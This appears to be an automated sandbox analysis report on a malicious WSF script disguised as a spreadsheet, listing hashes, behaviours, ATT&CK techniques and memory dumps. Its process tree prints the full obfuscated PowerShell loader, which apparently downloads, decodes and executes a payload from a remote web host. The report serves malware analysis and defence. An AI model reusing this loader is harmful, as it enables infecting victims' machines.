755d482683b5e165fae72bf4fc4d528f7c8cfada4e6b1aff7732a3f427f0ee13

General

Target

MTE-QT-20231211105 xls.wsf
Size

82KB
MD5

36dfda4c860dfbd57b093ba713f02b95
SHA1

fbe78a99a1d09521caf96e79affe068f8dfa8ad2
SHA256

755d482683b5e165fae72bf4fc4d528f7c8cfada4e6b1aff7732a3f427f0ee13
SHA512

6852606d27e6b77cf69eb709f3f7b108a25d8d7bb77c88c34e88303c0a411d118393a72d5de303e4e546cbfca1f21bdd04fc65089413881f2db58ed9a8f0f303
SSDEEP

1536:cXL/J9xd6SgcIL8FJgV9faDdYG9zkEnSw3g/aq+BLmYe7293I:MrJ9xsncIAJG9fahYGJnpwCZx7ey93I

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2192493100-457715857-1189582111-1000\Control Panel\International\Geo\Nation WScript.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4148 3108 WerFault.exe powershell.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

872 powershell.exe
872 powershell.exe
3108 powershell.exe
3108 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 872 powershell.exe
Token: SeDebugPrivilege 3108 powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2192493100-457715857-1189582111-1000\Control Panel\International\Geo\Nation	WScript.exe

pid	pid_target	process	target process
4148	3108	WerFault.exe	powershell.exe

pid	process
872	powershell.exe
872	powershell.exe
3108	powershell.exe
3108	powershell.exe

description	pid	process
Token: SeDebugPrivilege	872	powershell.exe
Token: SeDebugPrivilege	3108	powershell.exe

Suspicious use of WriteProcessMemory 5 IoCs

Processes:

WScript.exepowershell.exe

description	pid	process	target process
PID 2252 wrote to memory of 872	2252	WScript.exe	powershell.exe
PID 2252 wrote to memory of 872	2252	WScript.exe	powershell.exe
PID 872 wrote to memory of 3108	872	powershell.exe	powershell.exe
PID 872 wrote to memory of 3108	872	powershell.exe	powershell.exe
PID 872 wrote to memory of 3108	872	powershell.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\MTE-QT-20231211105 xls.wsf"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2252

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Trols9 ($Omtalens55){$Gregers = $Omtalens55.Length-1; For ($Regionplanlovenes45=6; $Regionplanlovenes45 -lt $Gregers){$Tumlede=$Tumlede+$Omtalens55.Substring( $Regionplanlovenes45, 1);$Regionplanlovenes45+=7;}$Tumlede;}$Mobilized=Trols9 'ExpedihTutorst Thymot valsepAntipa:Indtrn/Myriam/BaandsrtobaksaUterotc UplickMegnetosstninoUntripnGorgon.Genansn SyncyeAnnalitambuli/BndselwSpiritpSnvret- Knokli OvertnSkrigec chaptlDataneukonstrdErkende Udposs Laane/TindinfBiddaboEmulsinbaalbatPleurosFlugte/ AllotDFljssoeTipoldp PseudoSahrastTychoseHusbestSweatysImpeti.KartofaLyksalsFringbi Bjrne ';$Tumlede01=Trols9 'BeweariBagleae PerfexSulfit ';$Udsteningens140 = Trols9 ' Chevi\MultifsBeamliyPyrexrsStormvwturaluoLacmoiwSundhe6Noncir4Imbell\ PlundWFremoviAntimenFabelddForfreo CrinawShewbrsChairlPSolifuoEmanerwSupermeEnaarirBirketSmanichhSojaolemergedlNitriflInfant\LancervRaaste1Dishab.Reindi0 Scaff\TravelpAnstteopastorw HeldteKunzslr RaimusBarytihSangfoeCataphlCoumarlUnmana.felthre UhumsxTekstre Hytte ';. ($Tumlede01) (Trols9 'Friluf$ SkureS Demenp besvrrDiaplai NymphnAssyrig MrkesfBeefisiTvedeleBladmalSprjtedHallmo9 nonli2spisek2 githe=Mongre$ ArmigeUnflednPantomvwaygon:LoudmawSkemalikulturnadvarsdnumberiHeroicrForcer ') ;. ($Tumlede01) (Trols9 'Pulver$JehjdeU LandldLamelksKrngedt IndsnePrvelsnTenonti exubenBullfigremodue OrdenniniquisRatsta1 Kmpev4Hffdin0Kulara=Troldk$BiblioSUnleaspTystnerDorseriastraynkvalitgLillebfAtsaraiSearbieSwahillUninted Taluk9Initia2Alpeho2Person+mendac$PrikkeU CootsdAfsendsAbneurtFletvreTempornUnoffiiAarefonUndvrlgEkspreeBughinnSummarsSveske1 Prers4Editss0Prikke ') ;& ($Tumlede01) (Trols9 'Doedse$SekundUmirzabnSwiwetoJobkoduRenickt BroilsparrinpLustfuePneumaaMavedik DespoaEftermbUdbanklFundame Signa Spexe= Beskn Unicor(Timote(outtakgOverimwJomfrumElectriMyriam RappeewResumeiPakkefnMerino3 Reser2 skyde_ChondrpRundkir HalidoalkohocUnshameBudstisBeregnsBrsmgl Sludre-unconfFCondup FratrkP HjemmrProbasoSygerscSlughaeChanelsBeetlesDryppeIBoettedTrygle=Bordlb$Asphyx{FreakiPStandsIRecursD Skald}Precon)Medlem.attribCGarancoBrndsemEugenim Hemiba StyltnTrophoduncontLEchinii ConsenReutteeWeaken)Borger Interv-SemifasLokalepBarycelDefinii tilsvt Berve Ungibb[CadavecAphorihHimyaraCurucarHydrag] Inspi3 Sekon4 Canew ');. ($Tumlede01) (Trols9 'Undsee$ GingeVKodereiAdresst FyrtarBlacktiSofaerfNonspiiCasefyaimmortbAfloeslScratceFuncti Operat=Marksk Tunes$IrrefuUBycentnStandsoBridgeuWorsumtKreerisHorehupKvadrieDesignaRingekk Domina TetrabNiveaulDenotee night[Ublufo$RewaxeUIsdkkenGrederoFutteruPaahngt OpsgnsUdmarvpMusikheStophoa PeriekCactalaDdsscebColonnlgiftsteOpmunt.BalaencLinireo TaageuStudenndrowsyt Fakul- Blist2Desert] Opgav ');. ($Tumlede01) (Trols9 ' infik$regaraOKarattvRedockeArchesrSteatifbesaeti tichosSoamguhTerritiFremadnObelisgMoeurs= Strik(untresTSknsvieIndekss TamantTelety-pseudoP GraapaScrapptKrysanhHomost Pumaen$ TimbrU MicrodTaksensFunnymtAdvente VejgrndrammeiBehftenafsnitgtidsgleAngstlnAntidas Halsl1Aquari4Talteg0Cikori) Udgaa agron-MacrenADusenbnTegnefd Ledel Bondek(Gynaec[dickieIpantatn carpetPyrogrPFakesotwildfirFlkham]Trnere: Tigge:ForholsNonglaiFrederzOmkldeeMorgne Omnic-PerfeceltappeqUnresp Gaults8Hasfor)Metalh ') ;if ($Overfishing) {. $Udsteningens140 $Vitrifiable;} else {;$Tumlede00=Trols9 'SonatiSTransptAdhorta ExplorStrepstKonsta-StyrinBHardwaiSikkert inters MultiTBesejlrClancuaLivstynAntismsRealitfSpurteeUncharr Light Wordst-RytmisSKommanonayarduWheerhrRugemacCapacieEksemp Vgtfor$HaandvMManifeosamovabIndmeliGrundplCayuseiIntellztechnieVitropd nonko Smaag- PteroDTrrehjeHowsoms OxyqutLrdneui JavannPartioa Electt UncaciPragmaoRensninUnnebu Nervin$OneyerSSkoggepOmnivirSnydetiPleistnBakonggMinutefBogfrii BinomeLineupl PriordBeaver9ideali2 Tongu2Giftur ';& ($Tumlede01) (Trols9 'bernet$IodosoSToxicopBladsyr BeastiEqipmen Kneelgudnvnef GenskiFlammeeUnpattlOverindWiener9Skvatm2unnece2Coreig=Levert$ FragmeThrowon RechavOrthot: ForveaEmboucp EurytpBravehd Absoladiscont DokumaServil ') ;& ($Tumlede01) (Trols9 ' DiluvILateramUnsomepElleryoVaccinrLundent Casal-MiniatM RefleoElysiudSelvtiuSubburlBarebaeFinifl FrdigpBJuryerirebatetDustfasLeadwoTAnhydrr ThingaFornysneastwasStablefVandaleLaaserrnation ') ;$Springfield922=$Springfield922+'\Juradannelse.Lui';while (-not $intentively) {. ($Tumlede01) (Trols9 'Vandga$disseiiDemandnAntichtdancereforefanBlasfetSexualiGorgervYderbaeSpejlilLuftspyHavbej=Nonexi(NicotiTSelvsteSemisisSafrantlungeb-AutomaPTheurga SkelstCitolah Halvl Vitri$LygtemSAandsepAreolorslageliSulfofn BaasigRhythmfModtagiMamhypeVotivelPopuladMeldin9Geneal2Unders2Akties)Ameios ') ;. ($Tumlede01) $Tumlede00;. ($Tumlede01) (Trols9 'PraletSDagblatSarkofa KlassrUnavaitEmissi-ChansoSCircuml Subtreindkome StttepBlinds renlig5Bundte ');}. ($Tumlede01) (Trols9 'Browle$TegnstTfisherrConquio FaktolorkestsSaintl Rabicf= Basqn RoyceGKonsoreRomanitUngtel-BeduncCBrushuo DispannonelutPollise Sprngn GifletMellem Mishan$ klespS SuperpPrecenrTidsleiRomersn Preprg lnklafLymphgiTroldmeHgnetal cyperdFolkem9hepato2Parcel2Rettig ');. ($Tumlede01) (Trols9 ' Afgif$schuleP TempeeSnailelNavigatUndereitadpolgCountreozonizrTargona Gastr Augus= Velgr Rural[TykkamSLarvifySleuthsZoopart DenereCastromBarner. RedunCLeasinoUdskrinSkumplvbghjore DovenrKroghgt Cozil]Colpor:Reclim:BenbruFEnzootrGollyhoGravremUdstedBRumbaraKreatisImpasteImperi6Explai4TrilreSKolonntQuaffirConfesi vaporn IndevgRestle(Liverw$ MetalTUnattarCorolloPlumicl Bygges Presi)Patted ');& ($Tumlede01) (Trols9 'Agglut$ BimplTPicachuTropicmParentl UnsepeFinansd ParalePoloni2 potpo Butiks=Magtfa Skovhu[ShoebiSGyrateyArberfsAksiomtProtateDamprum Hjlpe.NonstyTNynorse pladexPartictExpost.BogfriE BlundnCoronacDegresoGunslidGreengiBifaldnTmmerfg Semim]Cartwa:Retran:HypotrAdownheSVantenCMortifIHypercIVrnede.RangleG ParagePhthontNouritS adjuntTrafikrSammeniKitashn IsidagEjeste(Impart$LivsvaPUndergeFipperlSpookitSvinefiRubinegBasisbe ExcusrUrnegraPrivil) Sands ');& ($Tumlede01) (Trols9 'Micros$AcerouUWatersn KompadMoonrieFremdarVrdipacHopkinh FlucaaslaughnBarytacAssuraeForbunl Samspl Skatto OrdinrIndhol2Divant1 Vibro2 Tapet=Afsnit$TipienTChiroguSkraalm Tribul MeriteUdvikldTohndieUnders2Udelel.Uprises Blameu TraktbSubtwisreformtStabler Antigi Stronn Ionerg Skill(underm2Madaga7Fatsto8Unloos5interr0 Dagbo8Krumme,Hytten2Stlign7Undliv2 Hindu7Befali1Harves)Ernhar ');& ($Tumlede01) $Underchancellor212;}"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:872

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Trols9 ($Omtalens55){$Gregers = $Omtalens55.Length-1; For ($Regionplanlovenes45=6; $Regionplanlovenes45 -lt $Gregers){$Tumlede=$Tumlede+$Omtalens55.Substring( $Regionplanlovenes45, 1);$Regionplanlovenes45+=7;}$Tumlede;}$Mobilized=Trols9 'ExpedihTutorst Thymot valsepAntipa:Indtrn/Myriam/BaandsrtobaksaUterotc UplickMegnetosstninoUntripnGorgon.Genansn SyncyeAnnalitambuli/BndselwSpiritpSnvret- Knokli OvertnSkrigec chaptlDataneukonstrdErkende Udposs Laane/TindinfBiddaboEmulsinbaalbatPleurosFlugte/ AllotDFljssoeTipoldp PseudoSahrastTychoseHusbestSweatysImpeti.KartofaLyksalsFringbi Bjrne ';$Tumlede01=Trols9 'BeweariBagleae PerfexSulfit ';$Udsteningens140 = Trols9 ' Chevi\MultifsBeamliyPyrexrsStormvwturaluoLacmoiwSundhe6Noncir4Imbell\ PlundWFremoviAntimenFabelddForfreo CrinawShewbrsChairlPSolifuoEmanerwSupermeEnaarirBirketSmanichhSojaolemergedlNitriflInfant\LancervRaaste1Dishab.Reindi0 Scaff\TravelpAnstteopastorw HeldteKunzslr RaimusBarytihSangfoeCataphlCoumarlUnmana.felthre UhumsxTekstre Hytte ';. ($Tumlede01) (Trols9 'Friluf$ SkureS Demenp besvrrDiaplai NymphnAssyrig MrkesfBeefisiTvedeleBladmalSprjtedHallmo9 nonli2spisek2 githe=Mongre$ ArmigeUnflednPantomvwaygon:LoudmawSkemalikulturnadvarsdnumberiHeroicrForcer ') ;. ($Tumlede01) (Trols9 'Pulver$JehjdeU LandldLamelksKrngedt IndsnePrvelsnTenonti exubenBullfigremodue OrdenniniquisRatsta1 Kmpev4Hffdin0Kulara=Troldk$BiblioSUnleaspTystnerDorseriastraynkvalitgLillebfAtsaraiSearbieSwahillUninted Taluk9Initia2Alpeho2Person+mendac$PrikkeU CootsdAfsendsAbneurtFletvreTempornUnoffiiAarefonUndvrlgEkspreeBughinnSummarsSveske1 Prers4Editss0Prikke ') ;& ($Tumlede01) (Trols9 'Doedse$SekundUmirzabnSwiwetoJobkoduRenickt BroilsparrinpLustfuePneumaaMavedik DespoaEftermbUdbanklFundame Signa Spexe= Beskn Unicor(Timote(outtakgOverimwJomfrumElectriMyriam RappeewResumeiPakkefnMerino3 Reser2 skyde_ChondrpRundkir HalidoalkohocUnshameBudstisBeregnsBrsmgl Sludre-unconfFCondup FratrkP HjemmrProbasoSygerscSlughaeChanelsBeetlesDryppeIBoettedTrygle=Bordlb$Asphyx{FreakiPStandsIRecursD Skald}Precon)Medlem.attribCGarancoBrndsemEugenim Hemiba StyltnTrophoduncontLEchinii ConsenReutteeWeaken)Borger Interv-SemifasLokalepBarycelDefinii tilsvt Berve Ungibb[CadavecAphorihHimyaraCurucarHydrag] Inspi3 Sekon4 Canew ');. ($Tumlede01) (Trols9 'Undsee$ GingeVKodereiAdresst FyrtarBlacktiSofaerfNonspiiCasefyaimmortbAfloeslScratceFuncti Operat=Marksk Tunes$IrrefuUBycentnStandsoBridgeuWorsumtKreerisHorehupKvadrieDesignaRingekk Domina TetrabNiveaulDenotee night[Ublufo$RewaxeUIsdkkenGrederoFutteruPaahngt OpsgnsUdmarvpMusikheStophoa PeriekCactalaDdsscebColonnlgiftsteOpmunt.BalaencLinireo TaageuStudenndrowsyt Fakul- Blist2Desert] Opgav ');. ($Tumlede01) (Trols9 ' infik$regaraOKarattvRedockeArchesrSteatifbesaeti tichosSoamguhTerritiFremadnObelisgMoeurs= Strik(untresTSknsvieIndekss TamantTelety-pseudoP GraapaScrapptKrysanhHomost Pumaen$ TimbrU MicrodTaksensFunnymtAdvente VejgrndrammeiBehftenafsnitgtidsgleAngstlnAntidas Halsl1Aquari4Talteg0Cikori) Udgaa agron-MacrenADusenbnTegnefd Ledel Bondek(Gynaec[dickieIpantatn carpetPyrogrPFakesotwildfirFlkham]Trnere: Tigge:ForholsNonglaiFrederzOmkldeeMorgne Omnic-PerfeceltappeqUnresp Gaults8Hasfor)Metalh ') ;if ($Overfishing) {. $Udsteningens140 $Vitrifiable;} else {;$Tumlede00=Trols9 'SonatiSTransptAdhorta ExplorStrepstKonsta-StyrinBHardwaiSikkert inters MultiTBesejlrClancuaLivstynAntismsRealitfSpurteeUncharr Light Wordst-RytmisSKommanonayarduWheerhrRugemacCapacieEksemp Vgtfor$HaandvMManifeosamovabIndmeliGrundplCayuseiIntellztechnieVitropd nonko Smaag- PteroDTrrehjeHowsoms OxyqutLrdneui JavannPartioa Electt UncaciPragmaoRensninUnnebu Nervin$OneyerSSkoggepOmnivirSnydetiPleistnBakonggMinutefBogfrii BinomeLineupl PriordBeaver9ideali2 Tongu2Giftur ';& ($Tumlede01) (Trols9 'bernet$IodosoSToxicopBladsyr BeastiEqipmen Kneelgudnvnef GenskiFlammeeUnpattlOverindWiener9Skvatm2unnece2Coreig=Levert$ FragmeThrowon RechavOrthot: ForveaEmboucp EurytpBravehd Absoladiscont DokumaServil ') ;& ($Tumlede01) (Trols9 ' DiluvILateramUnsomepElleryoVaccinrLundent Casal-MiniatM RefleoElysiudSelvtiuSubburlBarebaeFinifl FrdigpBJuryerirebatetDustfasLeadwoTAnhydrr ThingaFornysneastwasStablefVandaleLaaserrnation ') ;$Springfield922=$Springfield922+'\Juradannelse.Lui';while (-not $intentively) {. ($Tumlede01) (Trols9 'Vandga$disseiiDemandnAntichtdancereforefanBlasfetSexualiGorgervYderbaeSpejlilLuftspyHavbej=Nonexi(NicotiTSelvsteSemisisSafrantlungeb-AutomaPTheurga SkelstCitolah Halvl Vitri$LygtemSAandsepAreolorslageliSulfofn BaasigRhythmfModtagiMamhypeVotivelPopuladMeldin9Geneal2Unders2Akties)Ameios ') ;. ($Tumlede01) $Tumlede00;. ($Tumlede01) (Trols9 'PraletSDagblatSarkofa KlassrUnavaitEmissi-ChansoSCircuml Subtreindkome StttepBlinds renlig5Bundte ');}. ($Tumlede01) (Trols9 'Browle$TegnstTfisherrConquio FaktolorkestsSaintl Rabicf= Basqn RoyceGKonsoreRomanitUngtel-BeduncCBrushuo DispannonelutPollise Sprngn GifletMellem Mishan$ klespS SuperpPrecenrTidsleiRomersn Preprg lnklafLymphgiTroldmeHgnetal cyperdFolkem9hepato2Parcel2Rettig ');. ($Tumlede01) (Trols9 ' Afgif$schuleP TempeeSnailelNavigatUndereitadpolgCountreozonizrTargona Gastr Augus= Velgr Rural[TykkamSLarvifySleuthsZoopart DenereCastromBarner. RedunCLeasinoUdskrinSkumplvbghjore DovenrKroghgt Cozil]Colpor:Reclim:BenbruFEnzootrGollyhoGravremUdstedBRumbaraKreatisImpasteImperi6Explai4TrilreSKolonntQuaffirConfesi vaporn IndevgRestle(Liverw$ MetalTUnattarCorolloPlumicl Bygges Presi)Patted ');& ($Tumlede01) (Trols9 'Agglut$ BimplTPicachuTropicmParentl UnsepeFinansd ParalePoloni2 potpo Butiks=Magtfa Skovhu[ShoebiSGyrateyArberfsAksiomtProtateDamprum Hjlpe.NonstyTNynorse pladexPartictExpost.BogfriE BlundnCoronacDegresoGunslidGreengiBifaldnTmmerfg Semim]Cartwa:Retran:HypotrAdownheSVantenCMortifIHypercIVrnede.RangleG ParagePhthontNouritS adjuntTrafikrSammeniKitashn IsidagEjeste(Impart$LivsvaPUndergeFipperlSpookitSvinefiRubinegBasisbe ExcusrUrnegraPrivil) Sands ');& ($Tumlede01) (Trols9 'Micros$AcerouUWatersn KompadMoonrieFremdarVrdipacHopkinh FlucaaslaughnBarytacAssuraeForbunl Samspl Skatto OrdinrIndhol2Divant1 Vibro2 Tapet=Afsnit$TipienTChiroguSkraalm Tribul MeriteUdvikldTohndieUnders2Udelel.Uprises Blameu TraktbSubtwisreformtStabler Antigi Stronn Ionerg Skill(underm2Madaga7Fatsto8Unloos5interr0 Dagbo8Krumme,Hytten2Stlign7Undliv2 Hindu7Befali1Harves)Ernhar ');& ($Tumlede01) $Underchancellor212;}"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3108 -s 2608
4⤵
- Program crash
PID:4148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3108 -ip 3108
1⤵
PID:4440

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dq1l2xkx.slg.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/872-0-0x000001DB43E10000-0x000001DB43E32000-memory.dmp

Filesize
136KB

Download
memory/872-10-0x00007FF828390000-0x00007FF828E51000-memory.dmp

Filesize
10.8MB

Download
memory/872-11-0x000001DB42380000-0x000001DB42390000-memory.dmp

Filesize
64KB

Download
memory/872-12-0x000001DB42380000-0x000001DB42390000-memory.dmp

Filesize
64KB

Download
memory/872-13-0x000001DB42380000-0x000001DB42390000-memory.dmp

Filesize
64KB

Download
memory/872-44-0x00007FF828390000-0x00007FF828E51000-memory.dmp

Filesize
10.8MB

Download
memory/3108-26-0x0000000005A90000-0x0000000005AF6000-memory.dmp

Filesize
408KB

Download
memory/3108-33-0x0000000006130000-0x000000000617C000-memory.dmp

Filesize
304KB

Download
memory/3108-16-0x0000000002860000-0x0000000002870000-memory.dmp

Filesize
64KB

Download
memory/3108-18-0x0000000005340000-0x0000000005968000-memory.dmp

Filesize
6.2MB

Download
memory/3108-19-0x0000000005220000-0x0000000005242000-memory.dmp

Filesize
136KB

Download
memory/3108-15-0x0000000074DB0000-0x0000000075560000-memory.dmp

Filesize
7.7MB

Download
memory/3108-20-0x0000000005A20000-0x0000000005A86000-memory.dmp

Filesize
408KB

Download
memory/3108-31-0x0000000005CA0000-0x0000000005FF4000-memory.dmp

Filesize
3.3MB

Download
memory/3108-32-0x00000000060E0000-0x00000000060FE000-memory.dmp

Filesize
120KB

Download
memory/3108-17-0x0000000002860000-0x0000000002870000-memory.dmp

Filesize
64KB

Download
memory/3108-34-0x0000000007910000-0x0000000007F8A000-memory.dmp

Filesize
6.5MB

Download
memory/3108-35-0x0000000006680000-0x000000000669A000-memory.dmp

Filesize
104KB

Download
memory/3108-36-0x0000000007330000-0x00000000073C6000-memory.dmp

Filesize
600KB

Download
memory/3108-37-0x00000000072C0000-0x00000000072E2000-memory.dmp

Filesize
136KB

Download
memory/3108-38-0x0000000008540000-0x0000000008AE4000-memory.dmp

Filesize
5.6MB

Download
memory/3108-39-0x00000000076B0000-0x00000000076D2000-memory.dmp

Filesize
136KB

Download
memory/3108-40-0x0000000007730000-0x0000000007744000-memory.dmp

Filesize
80KB

Download
memory/3108-41-0x0000000074DB0000-0x0000000075560000-memory.dmp

Filesize
7.7MB

Download
memory/3108-14-0x00000000027F0000-0x0000000002826000-memory.dmp

Filesize
216KB

Download

Analysis

Sharing